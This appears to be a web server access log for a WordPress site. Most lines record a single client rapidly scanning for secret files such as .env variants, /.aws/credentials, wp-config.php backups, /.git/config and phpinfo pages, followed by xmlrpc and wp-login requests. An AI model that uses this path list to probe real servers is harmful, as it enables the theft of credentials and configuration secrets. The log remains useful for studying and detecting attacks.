62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /php_info.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/module.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/development.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /infophp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /i.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/database.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/application.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /dashboard/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/view.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/autoload/local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/test.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/session.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /application/config/routes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/queue.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /asdf.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/requirements.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /application/config/encryption.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /application/config/hooks.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /pinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/bootstrap.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/cache.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET / HTTP/1.1" 200 33931 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /app/etc/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /app/etc/config.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config/broadcasting.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /temp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/paths.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/production.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/constants.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.QA.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.Local.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /meteor.settings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /Properties/launchSettings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/settings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.docker/config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /admin/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/daemon.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /app/etc/env.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/prod.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /src/settings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /private/config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /api/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/dev.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/staging.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /shared/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /conf/application.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /prod/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/environment.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /src/config/config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /crm/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /?pp=enable&pp=env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.envs HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /development/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /laravel/core/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /backend/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /private/env.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /app/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /apps/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /src/config/environment.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.production HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /web/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /beta/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /kyc/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/local.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.production.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.save HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/env.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/env.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /public/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.docker.dev HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.docker/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.prod.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /laravel/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.gitlab-ci/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.vscode/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.dist HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.project HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.docker HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /?pp=env&pp=env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env-example HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.envrc HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.stage HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.travis HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /env.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env~ HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /live_env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env-sample HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.prod HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.sample HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /local/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.config HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.docker/laravel/app/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /mailer/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.example HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.backup HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /app/etc/env.local.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.development.sample HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.development.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.bak HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /admin-app/.env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /login?pp=enable&pp=env HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /aws.yml HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.dev.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/mimes.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /wp-config.php.old HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.git/config HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.env.dev HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/database.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/cli_bootstrap.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /sftp.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /dev/phpinfo.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.vscode/sftp.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/filesystems.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /?phpinfo=1 HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/services.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /index.php/phpinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /info.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpinfo.php4 HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.aws/config HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /_profiler/phpinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpversion.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpinfos.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpinfo.php5 HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /old_phpinfo.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /public/client/planinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /sftp-config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.local HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /frontend_dev.php/$ HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /linusadmin-phpinfo.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.wp-config.php.swp HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /infos.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /php-info.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.production HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /prevlaravel/sftp-config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /phpinfo.php3 HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/auth.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/constants.php/ HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/aws.yml HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /time.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/app.default.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /login/index.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/profiler.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/doctypes.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/app.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/email.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /wp-config.php.bak HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /symfony/_profiler/phpinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /wp-config.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.aws/credentials HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/php.ini HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/autoload/global.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.vscode/settings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /bundleconfig.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.remote HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/autoload.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/mail.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/acl.config.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/migration.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /.ssh/sftp-config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/security.config.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /launchSettings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/config.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/app_local.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /manifest.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/config.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/database.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /angular.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.Staging.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/development.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /tsconfig.spec.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /application/config/foreign_chars.php HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.Test.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /hosting.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /settings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.Production.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /api/config/tsconfig.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/production.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /tsconfig.app.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.Development.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/aws.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/default.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /appsettings.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config/test.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /config.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:22 +0800] "GET /tsconfig.json HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
36.133.115.36 - - [29/Oct/2025:04:16:24 +0800] "POST /wp-cron.php?doing_wp_cron=1761682583.4490380287170410156250 HTTP/1.1" 499 0 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [29/Oct/2025:04:39:39 +0800] "POST /wp-cron.php?doing_wp_cron=1761683979.2920451164245605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [29/Oct/2025:04:39:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Oct/2025:04:47:25 +0800] "POST /wp-cron.php?doing_wp_cron=1761684444.9703559875488281250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
57.128.175.14 - - [29/Oct/2025:04:47:25 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
36.133.115.36 - - [29/Oct/2025:05:05:36 +0800] "POST /wp-cron.php?doing_wp_cron=1761685536.9496240615844726562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.194.45.168 - - [29/Oct/2025:05:05:36 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
35.194.45.168 - - [29/Oct/2025:05:05:38 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:05:10:42 +0800] "POST /wp-cron.php?doing_wp_cron=1761685842.7997810840606689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
